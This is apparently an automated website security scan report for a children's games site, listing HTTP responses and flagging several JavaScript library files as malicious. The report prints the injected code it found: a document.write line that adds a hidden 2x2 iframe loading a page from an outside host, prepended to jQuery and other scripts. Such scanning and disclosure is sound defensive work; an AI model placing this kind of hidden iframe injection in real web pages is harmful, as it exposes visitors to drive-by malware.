Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=girlsgamesfan.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://girlsgamesfan.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 Jan 2015 10:06:26 GMT Location: http://www.girlsgamesfan.com/ Server: Apache Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.girlsgamesfan.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 10:06:27 GMT Location: http://www.girlsgamesfan.com/en Server: Apache/2.2 Content-Length: 0 Content-Type: text/html | clean |
http://www.girlsgamesfan.com/en | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 Jan 2015 10:06:27 GMT Location: http://www.girlsgamesfan.com/en/ Server: Apache/2.2 Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.girlsgamesfan.com/en/ | 200 OK Content-Length: 37298 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?i=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?i=3174895> | ||
http://www.girlsgamesfan.com/global/js/jquery_slimbox2.js | 200 OK Content-Length: 57414 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895></iframe>');
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.ex Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895> | ||
http://www.girlsgamesfan.com/global/js/slimbox2.js | 200 OK Content-Length: 4259 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895></iframe>');
(function(w){var E=w(window),u,g,F=-1,o,x,D,v,y,L,s,n=!window.XMLHttpRequest,e=window.opera&&(document.compatMode=="CSS1Compat")&&(w.browser.version>=9.3),m=document.documentElement,l={},t=new Image(),J=new Image(),H,a,h,q,I,d,G,c,A,K;w(function(){w("body").append(w([H=w('<div id="lbOverlay" /> jQuery(function($) { $("a[rel^='lightbox']").slimbox({}, null, function(el) { return (this == el) || ((this.rel.length > 8) && (this.rel == el.rel)); }); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895> | ||
http://www.girlsgamesfan.com/global/js/swfobject.js | 200 OK Content-Length: 9919 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895></iframe>');
var swfobject=function(){var b="undefined",Q="object",n="Shockwave Flash",p="ShockwaveFlash.ShockwaveFlash",P="application/x-shockwave-flash",m="SWFObjectExprInst",j=window,K=document,T=navigator,o=[],N=[],i=[],d=[],J,Z=null,M=null,l=null,e=false,A=false;var h=function(){var v=typeof K.getElementById!=b&&typeof Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895> | ||
http://www.girlsgamesfan.com/global/js/lib.js | 200 OK Content-Length: 4151 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895></iframe>');
function openPopup( szUrlPage, iWidth, iHeight) { var l = Math.floor((screen.width-iWidth)/2); var t = Math.floor((screen.height-iHeight)/2); window.open( szUrlPage, null, "width=" + iWidth + ",height=" + iHeight + ",top=" + t + ",left=" + l); } function truncString( szText, iMaxChars ){ if if (this.http_request.overrideMimeType) { this.http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { try { this.http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { this.http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } if (!this.http_request) { alert('Cannot create XMLHTTP instance'); } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895> | ||
http://www.girlsgamesfan.com/global/js/jquery-1.1.3.1.pack.js | 200 OK Content-Length: 21717 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895></iframe>');
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]) Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895> | ||
http://www.girlsgamesfan.com/global/js/jquery.history_remote.pack.js | 200 OK Content-Length: 2742 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895></iframe>');
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]) Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895> | ||
http://www.girlsgamesfan.com/global/js/jquery.tabs.pack.js | 200 OK Content-Length: 5897 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895></iframe>');
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]) Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=3174895 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=3174895> | ||
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12798 Content-Type: application/javascript | clean |
http://myslivecek.simply.com/simply.js?code=3279;2;0&v=2 | 200 OK Content-Length: 27 Content-Type: application/x-javascript | clean |
http://widget.supercounters.com/online_i.js | 200 OK Content-Length: 4233 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var sc_olimg_var = sc_olimg_var || [];
function sc_online_i(id, fcolor, bgcolor) { var info; if (fcolor.indexOf("#") !== 0) fcolor = "#" + fcolor; bgcolor = bgcolor.replace(/#/, ""); if (encodeURIComponent) { info = '&ua=' + encodeURIComponent(navigator.userAgent); info = info + '&ref=' + encodeURIComponent(document.referrer); info = info + '&url=' + encodeURIComponent(window.location); } else { cd.style.fontSize = "12px"; cd.style.color = "#ff0000"; cd.style.borderColor = "#ffffff"; cd.style.borderWidth = "1px"; cd.style.borderStyle = "solid"; cd.style.backgroundColor = sc_olimg_var['bgcolor']; cd.title = "Supercounters"; cd.innerHTML = msg; cd.onclick = function() { window.location = "http://www.supercounters.com/"; }; ct_insert(cd, "supercounters.com/online_i.js"); } Antivirus reports:
| ||
http://server.cpmstar.com/view.aspx?poolid=15896&script=1 | HTTP/1.1 302 Found Cache-Control: private,no-store, no-cache, must-revalidate Connection: close Date: Mon, 12 Jan 2015 10:06:34 GMT Pragma: no-cache Location: http://server.cpmstar.com/view.aspx?poolid=15896&script=1&test=1 Server: Microsoft-IIS/7.5 Content-Length: 189 Content-Type: text/html; charset=utf-8 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADM DEVa PSAa PSDa OUR OTR IND UNI NAV STA" Set-Cookie: USER_ID=%aem%ad%a9%0eZ%8ap_%b4%d8J%d4%3b%fa; domain=.server.cpmstar.com; expires=Fri, 12-Jan-2035 10:06:35 GMT; path=/ | clean |
http://server.cpmstar.com/view.aspx?poolid=15896&script=1&test=1 | 200 OK Content-Length: 512 Content-Type: text/html | clean |
http://server.cpmstar.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://server.cpmstar.com/cached/anchorad.js | 200 OK Content-Length: 2456 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: girlsgamesfan.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 12 Jan 2015 10:06:26 GMT
Location: http://www.girlsgamesfan.com/
Server: Apache
Content-Length: 237
Content-Type: text/html; charset=iso-8859-1
...237 bytes of data.
GET / HTTP/1.1
Host: girlsgamesfan.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 12 Jan 2015 10:06:26 GMT
Location: http://www.girlsgamesfan.com/
Server: Apache
Content-Length: 237
Content-Type: text/html; charset=iso-8859-1
...237 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: girlsgamesfan.com
Referer: http://www.google.com/search?q=girlsgamesfan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: girlsgamesfan.com
Referer: http://www.google.com/search?q=girlsgamesfan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.